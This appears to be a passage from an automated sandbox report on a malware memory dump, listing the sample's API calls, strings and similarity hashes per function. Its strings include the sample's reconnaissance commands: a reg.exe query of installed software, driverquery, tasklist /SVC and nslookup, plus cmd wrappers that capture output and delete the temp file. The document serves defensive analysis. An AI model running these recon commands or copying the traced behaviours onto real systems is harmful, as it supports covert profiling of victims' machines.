GetVersion.KERNEL32(?,00000000,7519F720,?,05403D2D,00000000,?,?,?,0540D948), ref: 0541FD30
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,05403D2D,00000000,?,?,?,0540D948), ref: 0541FD44
GetProcAddress.KERNEL32(00000000), ref: 0541FD4B

Strings

LdrUnregisterDllNotification, xrefs: 0541FD3A
NTDLL.DLL, xrefs: 0541FD3F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3940208311
Opcode ID: 8accb752e4ac29d8715191ca778d0b73b1dc9300199ced116052638e7746593f
Instruction ID: d95b1b9ff280a12ebeff6f48b5edef3f57b5471d4613c1304995eb69abf81b19
Opcode Fuzzy Hash: 8accb752e4ac29d8715191ca778d0b73b1dc9300199ced116052638e7746593f
Instruction Fuzzy Hash: FA01A771200624AFC7249F29E8859FA7BADFB5934435545ABF50787350CB30A846CF74

Uniqueness

Uniqueness Score: -1.00%

Function 05410908, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,05419360,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 0541090D
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05410922
wsprintfA.USER32 ref: 05410937

Part of subcall function 0542152E: memset.NTDLL ref: 05421543
Part of subcall function 0542152E: lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000000,cmd /C "%s> %s1"), ref: 0542157C
Part of subcall function 0542152E: wcstombs.NTDLL ref: 05421586
Part of subcall function 0542152E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000000,cmd /C "%s> %s1"), ref: 054215B7
Part of subcall function 0542152E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,054221AD), ref: 054215E3
Part of subcall function 0542152E: TerminateProcess.KERNEL32(?,000003E5), ref: 054215F9
Part of subcall function 0542152E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,054221AD), ref: 0542160D
Part of subcall function 0542152E: CloseHandle.KERNEL32(?), ref: 05421640
Part of subcall function 0542152E: CloseHandle.KERNEL32(?), ref: 05421645

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05410953

Strings

cmd /U /C "type %s1 > %s & del %s1", xrefs: 05410931

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID: cmd /U /C "type %s1 > %s & del %s1"
API String ID: 1624158581-4158521270
Opcode ID: 936a85d820d5fc009f546e1653bd7a7f8cd1ada6254f5b8ef3876bd31bea50f5
Instruction ID: 44d68509f0426526482a2af865d02437e863aa4e11e7b4e4f039d2ddbee35401
Opcode Fuzzy Hash: 936a85d820d5fc009f546e1653bd7a7f8cd1ada6254f5b8ef3876bd31bea50f5
Instruction Fuzzy Hash: 89F0A731A1453077D135162AAC0EFDB7F6DDBC2B60F960116F905E52D4CE1089468579

Uniqueness

Uniqueness Score: -1.00%

Function 0540D7CB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,.dll,?,00000000,0540B607,?,.dll,?,00001000,?,?,?), ref: 0540D7D9
lstrlen.KERNEL32(DllRegisterServer), ref: 0540D7E7
RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0540D7FC

Strings

DllRegisterServer, xrefs: 0540D7DF, 0540D7E4, 0540D80D
.dll, xrefs: 0540D7D7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeap
String ID: .dll$DllRegisterServer
API String ID: 3070124600-294589026
Opcode ID: 9171d45ab8578e12d0512eba2177be93ca7fa1f51150e9fe29bc8a689e6059e7
Instruction ID: c17ef9a7a8022415f0a67e6ad3ad903d4255268a8cb7c3c192ce03178e081729
Opcode Fuzzy Hash: 9171d45ab8578e12d0512eba2177be93ca7fa1f51150e9fe29bc8a689e6059e7
Instruction Fuzzy Hash: CAF0BE73D00230ABD3304BE8EC8DDEBBBACEF487507460222FA0AD3211DA30981187B4

Uniqueness

Uniqueness Score: -1.00%

Function 05404EBE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05958D20), ref: 05404EC7
Sleep.KERNEL32(0000000A,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 05404ED1
HeapFree.KERNEL32(00000000,?,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 05404EFF
RtlLeaveCriticalSection.NTDLL(05958D20), ref: 05404F14

Strings

0123456789ABCDEF, xrefs: 05404EEE

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: 0123456789ABCDEF
API String ID: 58946197-2554083253
Opcode ID: 9a1d6cd4150a5174f0f18ec344a265e587fa41d1916153dc5e369a371d8ae37d
Instruction ID: d9d7da683538a33d95c798ded4f60ee81ca84a38208e83feb456b5ec3f317a96
Opcode Fuzzy Hash: 9a1d6cd4150a5174f0f18ec344a265e587fa41d1916153dc5e369a371d8ae37d
Instruction Fuzzy Hash: 56F054746243229FEB2CCF15D48AFFA3B65BB55301B518026FA02CB390CB709810DA19

Uniqueness

Uniqueness Score: -1.00%

Function 0540F680, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 05412368: ExpandEnvironmentStringsW.KERNEL32(755506E0,00000000,00000000,755506E0,00000020,80000001,0540F69F,00750025,80000001), ref: 05412379
Part of subcall function 05412368: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 05412396

lstrlenW.KERNEL32(00000000,00000000,755506E0,00000020,00750025,80000001), ref: 0540F6C6
lstrlenW.KERNEL32(00000008), ref: 0540F6CD
lstrlenW.KERNEL32(?,?), ref: 0540F6E9
lstrlen.KERNEL32(?,006F0070,00000000), ref: 0540F763
lstrlenW.KERNEL32(?), ref: 0540F76F
wsprintfA.USER32 ref: 0540F79D

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 53b1c0aa6cebbc804bb63c409e454660111eb2838ea5b41b0b5ac10a614c7cef
Instruction ID: f12862f293424b86ece11adc383a5eed0d48d42d0b9f4baee75e147718380bbc
Opcode Fuzzy Hash: 53b1c0aa6cebbc804bb63c409e454660111eb2838ea5b41b0b5ac10a614c7cef
Instruction Fuzzy Hash: D8415D72A00229BFDB11EFA5DC49DEE7BBDEF44204B154076F908D7261EB30D9198B20

Uniqueness

Uniqueness Score: -1.00%

Function 054079CC, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 05423252: lstrlen.KERNEL32(054160B5,00000008,054160B5,00000000,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60,00000000,?,?,05420742), ref: 0542325E
Part of subcall function 05423252: memcpy.NTDLL(00000000,054160B5,054160B5,054160B5,00000001,00000001,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60,00000000), ref: 054232BC
Part of subcall function 05423252: lstrcpy.KERNEL32(00000000,00000000), ref: 054232CC

lstrlen.KERNEL32(?,00000000,?,?), ref: 05407A1B
wsprintfA.USER32 ref: 05407A4B
GetLastError.KERNEL32 ref: 05407AC0

Strings

Content-Type: application/octet-stream, xrefs: 05407A3F
`, xrefs: 05407A7C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: Content-Type: application/octet-stream$`
API String ID: 324226357-1382853987
Opcode ID: a8f48ef14c3a0bcbe1329d32a4c1cabee72b93ad360058013ab06d25020acdcb
Instruction ID: cad4cd0e31c97e4ba744612e1c1bbcf59f0d7d50f7f59cfa37e03e5264ff671c
Opcode Fuzzy Hash: a8f48ef14c3a0bcbe1329d32a4c1cabee72b93ad360058013ab06d25020acdcb
Instruction Fuzzy Hash: F331B072600219ABDF21DF61CC85FEB7BAAFF44210F60403AF90597290DA70EA158F61

Uniqueness

Uniqueness Score: -1.00%

Function 0541A366, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 05405E4C: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 05405E58
Part of subcall function 05405E4C: SetLastError.KERNEL32(000000B7,?,0541A37A), ref: 05405E69

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0541A39A
CloseHandle.KERNEL32(00000000), ref: 0541A472

Part of subcall function 0541D34C: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0541D366
Part of subcall function 0541D34C: CreateWaitableTimerA.KERNEL32(0542E0E4,00000003,?), ref: 0541D383
Part of subcall function 0541D34C: GetLastError.KERNEL32(?,?,0541A3CE,?), ref: 0541D394
Part of subcall function 0541D34C: GetSystemTimeAsFileTime.KERNEL32(?,00000000,0541A3CE,?,?,?,0541A3CE,?), ref: 0541D3D4
Part of subcall function 0541D34C: SetWaitableTimer.KERNEL32(?,0541A3CE,00000000,00000000,00000000,00000000,?,?,0541A3CE,?), ref: 0541D3F3
Part of subcall function 0541D34C: HeapFree.KERNEL32(00000000,0541A3CE,00000000,0541A3CE,?,?,?,0541A3CE,?), ref: 0541D409

GetLastError.KERNEL32(?), ref: 0541A45B
ReleaseMutex.KERNEL32(00000000), ref: 0541A464

Part of subcall function 05405E4C: CreateMutexA.KERNEL32(0542E0E4,00000000,?,?,0541A37A), ref: 05405E7C

GetLastError.KERNEL32 ref: 0541A47F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 0c4cacf1d86000b766bd24a78e8f211d30409bb81db19a299f076307827df6a7
Instruction ID: 11e85d37c8d5a0a8fbc10cf7de2b9d57ef08cd8cea0d0c23e4a9f9f0528d2d3d
Opcode Fuzzy Hash: 0c4cacf1d86000b766bd24a78e8f211d30409bb81db19a299f076307827df6a7
Instruction Fuzzy Hash: 7F316F75A112149FCB249FB6D8898EE7FBAFB88200755446BFC06D7390DA708902DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0540BA82, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 0540BA9B

Part of subcall function 0541E943: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05417661), ref: 0541E969

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,054195E1,00000000), ref: 0540BADD
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0540BB2F
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,054195E1,00000000), ref: 0540BB48

Part of subcall function 05425694: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 054256B5
Part of subcall function 05425694: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,0540BACE,00000000,00000000,00000000,00000001,?,00000000), ref: 054256F8

GetLastError.KERNEL32(?,00000000,054195E1,00000000,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540BB80

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: 84d07804489f067db16e5a4f5c56260fb99faec57532aa88a7869675657d4928
Instruction ID: 5cb33b733e1a8f2c5641a8c821ff22f5b7e16196b78dcbbf9d39f080f79decb5
Opcode Fuzzy Hash: 84d07804489f067db16e5a4f5c56260fb99faec57532aa88a7869675657d4928
Instruction Fuzzy Hash: 83315E71A00214AFDF25EF65D889EEE7FB5FF04750F60406AF906A7284DB709A41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 05401E0C, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 05422FEE: lstrlen.KERNEL32(?,00000000,?,75145520,05401E20,00000000,?,00000000,75145520,?,00000022,00000000,?,00000000), ref: 05422FFA

RtlEnterCriticalSection.NTDLL(0542E288), ref: 05401E36
RtlLeaveCriticalSection.NTDLL(0542E288), ref: 05401E49
GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 05401E5A
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 05401EC5
InterlockedIncrement.KERNEL32(0542E29C), ref: 05401EDC

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 54d7273111e6a157fbdf72fec6ac72bd195de4445be9703f4618c00a55f1d1e3
Instruction ID: 541c0237d07990bef9675e133ea77a91fa3e3e09179a87b06f2b9bf76a7e6f16
Opcode Fuzzy Hash: 54d7273111e6a157fbdf72fec6ac72bd195de4445be9703f4618c00a55f1d1e3
Instruction Fuzzy Hash: 0D31A2316047229FC729CF64D8459AFBBF9FB44321B515A6EF95683290CB30D811CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0540B3ED, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,05411ABF,00000000,?,?), ref: 0540B40B
GetFileSize.KERNEL32(00000000,00000000,?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05,75145519,?,00000000), ref: 0540B41B
ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05), ref: 0540B447
GetLastError.KERNEL32(?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731,?), ref: 0540B46C
CloseHandle.KERNEL32(000000FF,?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731), ref: 0540B47D

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: 49e19e5566e9bd409885cc981840f5005c5b16ae6b4aa41caeb55a03c4441cd8
Instruction ID: 8a262c3f1338b53166d3c0d30bf7cdd2e760d29d100bd55a932e162e6f751c3a
Opcode Fuzzy Hash: 49e19e5566e9bd409885cc981840f5005c5b16ae6b4aa41caeb55a03c4441cd8
Instruction Fuzzy Hash: 6011B472100225BFDB30AF64CC88EEF7A59FB45290F218276F956A72D0C6709E40D665

Uniqueness

Uniqueness Score: -1.00%

Function 05411B0D, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 05411B1E
StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 05411B37
StrTrimA.SHLWAPI(?,20000920), ref: 05411B5F
StrTrimA.SHLWAPI(00000000,20000920), ref: 05411B6E
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 05411BA5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: bc4691597bc8020ccc70862277299a0a0441c88b5c55af46470a3493f90bd156
Instruction ID: a4af798f4d1832b940dad65434001c6a2d957e9a33487e8d561007aba9d34171
Opcode Fuzzy Hash: bc4691597bc8020ccc70862277299a0a0441c88b5c55af46470a3493f90bd156
Instruction Fuzzy Hash: 33118172610215ABD7219B99DD89FEB7FACEB84690F100022FA0ED7240EAB0D902C764

Uniqueness

Uniqueness Score: -1.00%

Function 0541CBB8, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,?,00000000,054195E1,?,?,?,05419E9B,75145520,0540BB95,00000000,00000000), ref: 0541CBEF
VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,05419E9B,75145520,0540BB95,00000000,00000000,?,00000000,054195E1,00000000), ref: 0541CC1F
RtlEnterCriticalSection.NTDLL(0542E260), ref: 0541CC2E
RtlLeaveCriticalSection.NTDLL(0542E260), ref: 0541CC4C
GetLastError.KERNEL32(?,05419E9B,75145520,0540BB95,00000000,00000000,?,00000000,054195E1,00000000), ref: 0541CC5C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: dbeb796fbebeab7c59808d45b250351be1959e41e5f1c907f93a84edeefc4b7c
Instruction ID: 47dc28402e7623acebef41d80fccc32bb901af0be028665bd6df77b531f33d7e
Opcode Fuzzy Hash: dbeb796fbebeab7c59808d45b250351be1959e41e5f1c907f93a84edeefc4b7c
Instruction Fuzzy Hash: 5F210CB5600B15EFD724CFA9CAC599ABBF8FB08300700856AEA5693750E770ED14CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0541F72F, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0541F75D
GetLastError.KERNEL32 ref: 0541F780
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0541F793
GetLastError.KERNEL32 ref: 0541F79E
HeapFree.KERNEL32(00000000,00000000), ref: 0541F7E6

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 675c8c6d9b73888dd89175d0b6083e962d47c1397afb9652872ebec30ea50612
Instruction ID: 2a481b1dc30c35e92eb77667af2962cc6526f01c58c5627369228a8ba70eb866
Opcode Fuzzy Hash: 675c8c6d9b73888dd89175d0b6083e962d47c1397afb9652872ebec30ea50612
Instruction Fuzzy Hash: 1C218E70500644FBEB248F50D98DBEE7BBABB00714FA0045AF522961E0DB75998ACB29

Uniqueness

Uniqueness Score: -1.00%

Function 05415478, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0541548C
memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,0541A732,00000000,00000000,00000001,?,05425798,00000020,00000000,?,00000000), ref: 054154B5
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 054154DE
RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0541A732,00000000,00000000,00000001,?,05425798,00000020,00000000), ref: 054154FE
RegCloseKey.ADVAPI32(00000000,?,0541A732,00000000,00000000,00000001,?,05425798,00000020,00000000,?,00000000,?,00000000,00000000), ref: 05415509

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: e347d97e704408ebc158889f16b1d3c7eb208206008b172890a6f44ce07516bb
Instruction ID: f69eae134a89687d0f141c1893e01f03aec9974557f9e42a3d852cc3c4ccf019
Opcode Fuzzy Hash: e347d97e704408ebc158889f16b1d3c7eb208206008b172890a6f44ce07516bb
Instruction Fuzzy Hash: 8411A032600119BFDF216E69EC49FFB7A6EFB84251F144027FD01E2290DA718D209BA5

Uniqueness

Uniqueness Score: -1.00%

Function 054053B5, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(05414E72,?,?,?,?,00000008,05414E72,00000000,?,?,?,05422B61,00000000,00000000,?,0000000E), ref: 054053D2
memcpy.NTDLL(05414E72,?,00000009,?,?,?,?,00000008,05414E72,00000000,?,?,?,05422B61,00000000,00000000), ref: 054053F4
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0540540C
lstrlenW.KERNEL32(00000000,00000001,05414E72,?,?,?,?,?,?,?,00000008,05414E72,00000000,?,?), ref: 0540542C
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,05414E72,00000000,?), ref: 05405451

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: 8d77ece5625e41c5cf3cd8befe3979d14b33d4072751d28caa2be99e1209049a
Instruction ID: a186954e19f2447ab6680570a3ecc5244a4e42f9bce37479e102b5205474eb5b
Opcode Fuzzy Hash: 8d77ece5625e41c5cf3cd8befe3979d14b33d4072751d28caa2be99e1209049a
Instruction Fuzzy Hash: E311B276E00218BBCB249BA5EC09FDE7FB8EF48351F008065FA05E2280DA74D609CB65

Uniqueness

Uniqueness Score: -1.00%

Function 054150DA, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000008,0541A6CC,00000000,00000000,00000000,00000020,00000000,?,05425798,00000020,00000000,?,00000000), ref: 054150E4

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

lstrcpy.KERNEL32(00000000,00000000), ref: 05415108
StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,05425798,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0541510F
lstrcpy.KERNEL32(00000000,4C003436), ref: 05415157
lstrcat.KERNEL32(00000000,?), ref: 05415166

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: cf5bb93b0dc7853d9793fae26699c8bdb92609782f17262548490a77553371aa
Instruction ID: ca15ee59ba95bd96a936524760ca7f6370ae375d71c74707785f5b615f8528e5
Opcode Fuzzy Hash: cf5bb93b0dc7853d9793fae26699c8bdb92609782f17262548490a77553371aa
Instruction Fuzzy Hash: C3119132604225ABD721CA66DC89FEB7BECBBC5600F49002AF909D3200EB70D849CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0541E3A0, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 05422FEE: lstrlen.KERNEL32(?,00000000,?,75145520,05401E20,00000000,?,00000000,75145520,?,00000022,00000000,?,00000000), ref: 05422FFA

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0541E3C9
memcpy.NTDLL(00000000,?,?), ref: 0541E3DC
RtlEnterCriticalSection.NTDLL(0542E288), ref: 0541E3ED
RtlLeaveCriticalSection.NTDLL(0542E288), ref: 0541E402
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0541E43A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 343bddc2788827c5095579c6d29856cd6affd75969427722b257e82905c558aa
Instruction ID: b878f9daf191365d2ce05a2e486d0348de2f9400c51e936541aa5b699ffe43bc
Opcode Fuzzy Hash: 343bddc2788827c5095579c6d29856cd6affd75969427722b257e82905c558aa
Instruction Fuzzy Hash: E011C675614230AFD7295F14EC45CEB7FACFB85361746456AFD0293240CA315C11DBBA

Uniqueness

Uniqueness Score: -1.00%

Function 05423303, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 05423323
GetModuleHandleA.KERNEL32 ref: 05423331
LoadLibraryExW.KERNEL32(?,?,?), ref: 0542333E
GetModuleHandleA.KERNEL32 ref: 05423355
GetModuleHandleA.KERNEL32 ref: 05423361

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 0d5747aea9fa7c68b01796c1fb08e8bea82138ff84915d1ccfd193ec77e15324
Instruction ID: 115c1a18eb29d840d8cef03340f5f02acf369c64a75c3a3ff42a3c4ad37e3967
Opcode Fuzzy Hash: 0d5747aea9fa7c68b01796c1fb08e8bea82138ff84915d1ccfd193ec77e15324
Instruction Fuzzy Hash: B0014F3161423A9F9B155F6DEC41AEA7FA9FF14260394443BF914C2260DFB1D9228EA4

Uniqueness

Uniqueness Score: -1.00%

Function 0541CD07, Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0541DAC1), ref: 0541CD0D
StrTrimA.SHLWAPI(00000001,0A0D0920,?,0541DAC1), ref: 0541CD30
StrTrimA.SHLWAPI(00000000,0A0D0920,?,0541DAC1), ref: 0541CD3F
_strupr.NTDLL ref: 0541CD42
lstrlen.KERNEL32(00000000,0541DAC1), ref: 0541CD4A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Trim$_struprlstrlen
String ID:
API String ID: 2280331511-0
Opcode ID: 3b6c92b97f3f7ddcb4480285161d5e778dbb77950ab4cbcb03cbb7b1f79f7dcc
Instruction ID: 4c7cd3ea81850f42878dd54e27865399b6326685d550977019c76e64c5c668bc
Opcode Fuzzy Hash: 3b6c92b97f3f7ddcb4480285161d5e778dbb77950ab4cbcb03cbb7b1f79f7dcc
Instruction Fuzzy Hash: 32F04F312141316FE3299B65AC8AFFA3BACEB45650B500019F54AC7280DF64DD128B65

Uniqueness

Uniqueness Score: -1.00%

Function 0542337D, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0542E260), ref: 05423388
RtlLeaveCriticalSection.NTDLL(0542E260), ref: 05423399
VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,05410E41,0542D7A0,751457B0,00000000,0541171D,0000000C,00000000,?,0000000C,00000000), ref: 054233B0
VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,05410E41,0542D7A0,751457B0,00000000,0541171D,0000000C,00000000,?,0000000C,00000000), ref: 054233CA
GetLastError.KERNEL32(?,?,05410E41,0542D7A0,751457B0,00000000,0541171D,0000000C,00000000,?,0000000C,00000000,WININET.dll), ref: 054233D7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 08d1eb2521f09296b50c133d4db681d409b8ff54cf39e064142add6a676dd3f2
Instruction ID: 7f20cb0daa903146b5ee7f6d3f8935dfb7d519457101412786e7c98daaf08d52
Opcode Fuzzy Hash: 08d1eb2521f09296b50c133d4db681d409b8ff54cf39e064142add6a676dd3f2
Instruction Fuzzy Hash: 8D014B75200718EFD7259F29D805EAABBF9EF84620B118529FA52D3790DB70EA01CF24

Uniqueness

Uniqueness Score: -1.00%

Function 0541CDFD, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0540D597: InterlockedExchange.KERNEL32(?,000000FF), ref: 0540D59E

